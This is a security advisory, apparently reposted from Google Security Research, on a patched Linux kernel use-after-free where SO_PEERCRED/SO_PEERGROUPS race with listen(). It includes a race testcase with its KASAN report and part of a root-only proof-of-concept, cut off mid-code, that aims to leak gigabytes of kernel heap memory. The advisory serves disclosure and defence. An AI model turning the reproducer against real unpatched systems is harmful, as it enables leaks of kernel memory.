Authored by Jann Horn, Google Security Research

Linux suffered from a use-after-free read vulnerability caused by SO_PEERCRED and SO_PEERGROUPS racing with listen() (and connect()). This has been addressed in stable versions 5.14.10, 5.10.71, 5.4.151, 4.19.209, 4.14.249, 4.9.286, and 4.4.288.

Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())

# bug description

In sock_getsockopt() (in net/core/sock.c), the handlers for the
socket options SO_PEERCRED (which has probably had a data race since
forever; that race was turned into a UAF read in v2.6.36 by commit
"af_unix: Allow SO_PEERCRED to work across namespaces") and
SO_PEERGROUPS (introduced in v4.13 by commit "net: introduce
SO_PEERGROUPS getsockopt") don't use any locking when copying data from
sk->sk_peer_cred to userspace.

This can race with operations that update sk->sk_peer_cred:

- unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)
- unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)

This means that if the creds are replaced and freed at the wrong time, a
use-after-free read occurs.

From what I can tell, the impact on the kernel is limited to data leakage.
Theoretically, it could also lead to an out-of-bounds *write* to
*userspace* memory if a victim process calls SO_PEERGROUPS on a socket
whose ->sk_peer_cred is going away; however, in a normal scenario,
SO_PEERGROUPS would only be called on a socket from accept(), and a
less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred
on that socket.



# simple testcase

In a Linux VM with CONFIG_KASAN=y and CONFIG_RCU_STRICT_GRACE_PERIOD=y,
this issue can be demonstrated with the following testcase.

Note that this testcase is using SO_PEERCRED in a weird way: It reads
the "peer credentials" of a listening socket, which doesn't really make
any semantic sense. As far as I can tell from reading the code, you
could also trigger the same UAF by racing SO_PEERCRED with repeated
calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),
but then the race would get more complicated.

```
// compile with "gcc -pthread -o peercred_uaf peercred_uaf.c -Wall"
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/fsuid.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>

// Socket shared by both threads: main() binds it and calls listen() on it in
// a loop, while ucred_thread() concurrently reads SO_PEERCRED from it.
static int s;
// UID returned by getuid() at startup; passed back unchanged to the raw
// setresuid() syscall in main()'s loop.
static uid_t my_uid;
// GID returned by getgid() at startup; not otherwise used by this testcase.
static gid_t my_gid;

// Reader side of the race: query SO_PEERCRED on the shared socket `s` in an
// endless loop. A failing getsockopt() is reported with perror() and the loop
// simply carries on; this function never returns.
void *ucred_thread(void *dummy) {
	for (;;) {
		struct ucred peer;
		socklen_t peer_len = sizeof(peer);
		int rc = getsockopt(s, SOL_SOCKET, SO_PEERCRED, &peer, &peer_len);

		if (rc != 0)
			perror("getsockopt");
	}
}

// Writer side of the race: bind a UNIX stream socket, start the SO_PEERCRED
// reader thread, then loop forever alternating listen() on that socket with a
// raw setresuid() syscall. Only exits on a fatal setup/setresuid error.
int main(void) {
my_uid = getuid();
my_gid = getgid();

s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1) err(1, "socket");
struct sockaddr_un bind_addr = {
.sun_family = AF_UNIX,
.sun_path = "/tmp/unix-test-socket"
};
// remove the path first (presumably so a socket file left over from an
// earlier run doesn't make bind() fail); the result is deliberately ignored
unlink(bind_addr.sun_path);
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
err(1, "bind");

// start the thread that keeps calling getsockopt(SO_PEERCRED) on `s`
pthread_t thread;
if (pthread_create(&thread, NULL, ucred_thread, NULL))
errx(1, "pthread_create");

while (1) {
// per the bug description, unix_listen() updates sk->sk_peer_cred via
// init_peercred() on every call, including LISTEN->LISTEN
if (listen(s, 16))
perror("listen");
// avoid glibc's automatic thread sync in set*id() wrappers!
// note that setfsuid() doesn't reallocate on no-op request.
// (the KASAN report shows __sys_setresuid() allocating the cred via
// prepare_creds(); presumably this is what lets the cred stored by the
// previous listen() lose its last reference and be freed)
if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))
err(1, "setresuid(raw)");
}
}
```

This results in the following splat:

```
BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619

CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Call Trace:
dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))
print_address_description.constprop.0 (mm/kasan/report.c:257)
[...]
kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459)
[...]
sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
[...]
__sys_getsockopt (net/socket.c:2216)
[...]
__x64_sys_getsockopt (net/socket.c:2232)
[...]
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)
RIP: 0033:0x7f93cd99a5ca
Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48
All code
========
0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0
7: f7 d8 neg %eax
9: 64 89 01 mov %eax,%fs:(%rcx)
c: 48 83 c8 ff or $0xffffffffffffffff,%rax
10: c3 ret
11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
18: 00 00 00
1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
20: 49 89 ca mov %rcx,%r10
23: b8 37 00 00 00 mov $0x37,%eax
28: 0f 05 syscall
2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction
30: 73 01 jae 0x33
32: c3 ret
33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0
3a: f7 d8 neg %eax
3c: 64 89 01 mov %eax,%fs:(%rcx)
3f: 48 rex.W

Code starting with the faulting instruction
===========================================
0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax
6: 73 01 jae 0x9
8: c3 ret
9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6
10: f7 d8 neg %eax
12: 64 89 01 mov %eax,%fs:(%rcx)
15: 48 rex.W
RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca
RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003
RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700
R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee
R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000

Allocated by task 618:
kasan_save_stack (mm/kasan/common.c:38)
__kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467)
kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219)
prepare_creds (kernel/cred.c:262)
__sys_setresuid (kernel/sys.c:666)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

Freed by task 618:
kasan_save_stack (mm/kasan/common.c:38)
kasan_set_track (mm/kasan/common.c:46)
kasan_set_free_info (mm/kasan/generic.c:362)
__kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374)
kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499)
rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743)
__do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559)

Last potentially related work creation:
kasan_save_stack (mm/kasan/common.c:38)
kasan_record_aux_stack (mm/kasan/generic.c:348)
call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067)
init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613)
unix_listen (net/unix/af_unix.c:648)
__sys_listen (net/socket.c:1727)
__x64_sys_listen (net/socket.c:1734)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

The buggy address belongs to the object at ffff8880355c7c40
which belongs to the cache cred_jar of size 192
The buggy address is located 36 bytes inside of
192-byte region [ffff8880355c7c40, ffff8880355c7d00)
The buggy address belongs to the page:
page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4
head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0
flags: 0x4000000000010200(slab|head|zone=1)
raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0
raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb
^
ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
```


# root-only reproducer for normal systems

The following is a simple reproducer that attempts to use this issue to
dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which
effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)
from a dangling pointer in groups_to_user().
(Note: There are two functions called groups_to_user(). The relevant one
is in net/core/sock.c.)

This isn't quite a real exploit - it **requires root privileges** to
call setgroups() and, if userfaultfd is restricted, also to trap a kernel
fault with userfaultfd. I expect that you could get around those
limitations with some work though, assuming that the attacker is running
in a normal Linux userspace.

Note that this bug can still be used to dump gigabytes of kernel heap
memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the
out-of-bounds read occurs outside of usercopy code:

```
/*
 * Quoted from net/core/sock.c: writes each gid of @src, translated with
 * from_kgid_munged() for the caller's user namespace, to consecutive slots of
 * the userspace array @dst, one put_user() per entry.
 *
 * Returns 0 on success, or -EFAULT as soon as a put_user() fails.
 */
static int groups_to_user(gid_t __user *dst, const struct group_info *src)
{
struct user_namespace *user_ns = current_user_ns();
int i;

/*
 * Both the loop bound (src->ngroups) and the copied values (src->gid[i])
 * are read through @src. In the race described here @src can be a
 * dangling pointer, so the bound acts as an attacker-influenced copy
 * length, and the reads happen here rather than in usercopy code.
 */
for (i = 0; i < src->ngroups; i++)
if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))
return -EFAULT;

return 0;
}
```


```
// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread
#define _GNU_SOURCE
#include <pthread.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <err.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <grp.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/eventfd.h>
#include <limits.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <linux/membarrier.h>

// kernel sets upper limit: 65536.
// up to 2 pages will be served by slabs, we probably don't want that.
// choose a size between order-3 and order-4 (means needs order-4 page)
// (0x1000 << 3) * 3 / 2 == 0xc000 bytes, i.e. 1.5x an 8-page block when
// pages are 0x1000 bytes.
#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)
// number of 4-byte entries that fit in ALLOC_SIZE after subtracting 8 bytes
// (presumably the group_info header preceding the gid array - TODO confirm)
#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)
// size in bytes of the writable part of the output mapping (0x400000000 = 16 GiB)
#define OUTPUT_MAPPING_LEN 0x400000000

// socket on which getsockopt_threadfn() issues SO_PEERGROUPS
static int s;
// eventfd that getsockopt_threadfn() reads (blocks on) before calling getsockopt()
static int launch_eventfd;
// start of the anonymous mapping passed to getsockopt() as the output buffer
static unsigned char *output_mapping;

// Worker thread: wait on launch_eventfd until it becomes readable, then issue
// a single SO_PEERGROUPS getsockopt() on `s`, writing into output_mapping with
// an option length of INT_MAX.
//
// Returns NULL when getsockopt() succeeds. If eventfd_read() fails, the process
// is terminated via err(); if getsockopt() fails, the error is printed and the
// whole process exits with status 1.
static void *getsockopt_threadfn(void *dummy) {
	eventfd_t launch_val;
	int wait_rc = eventfd_read(launch_eventfd, &launch_val);
	if (wait_rc != 0)
		err(1, "eventfd_read");

	socklen_t out_len = INT_MAX;
	int rc = getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &out_len);
	if (rc == 0)
		return NULL;

	perror("getsockopt");
	//system("cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
	exit(1);
}

// Print a banner containing `label`, then run grep to show the lines of
// /proc/pagetypeinfo that match 'Node.*Unmovable'.
//
// label: text embedded in the "=== DUMP ... ===" banner.
//
// The exit status of the grep command is ignored (diagnostic output only).
void dump(char *label) {
	// The banner's line breaks have to be spelled as \n escapes: a C string
	// literal may not contain a raw newline, so the literal would otherwise be
	// unterminated and the file would not compile.
	printf("\n=== DUMP %s ===\n", label);
	// Push the banner out before the child process writes, so the banner stays
	// ahead of grep's output even when stdout is not line-buffered.
	fflush(stdout);
	system("grep 'Node.*Unmovable' /proc/pagetypeinfo");
}

int main(void) {
char dummy_char;

// set up sleep-inducing mapping
output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (output_mapping == MAP_FAILED) err(1, "mmap");
if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))
err(1, "mprotect");
int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);
if (uffd == -1) err(1, "userfaultfd");
struct uffdio_api api = {
.api = UFFD_API,
.features = 0
};
if (ioctl(uffd, UFFDIO_API, &api))
err(1, "UFFDIO_API");
struct uffdio_register reg = {
.range = {.start = (unsigned long)output_mapping, .len = 0x1000},
.mode = UFFDIO_REGISTER_MODE_MISSING
};
if (ioctl(uffd, UFFDIO_REGISTER, &reg))
err(1, "UFFDIO_REGISTER");

// prepare getsockopt() thread
launch_eventfd = eventfd(0, 0);
if (launch_eventfd == -1) err(1, "eventfd");
pthread_t thread;
if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))
errx(1, "pthread_create");

// set up for reallocation primitive
int realloc_fd = open("/proc/self/maps", O_RDONLY);
if (realloc_fd == -1) err(1, "open maps");

char tmpdir[] = "/tmp/blah.XXXXXX";
if (mkdtemp(tmpdir) == NULL) err(1, "mkdtemp");
if (chdir(tmpdir)) err(1, "chdir tmpdir");
char dummy_name[100];
memset(dummy_name, 'A', 99);
dummy_name[99] = '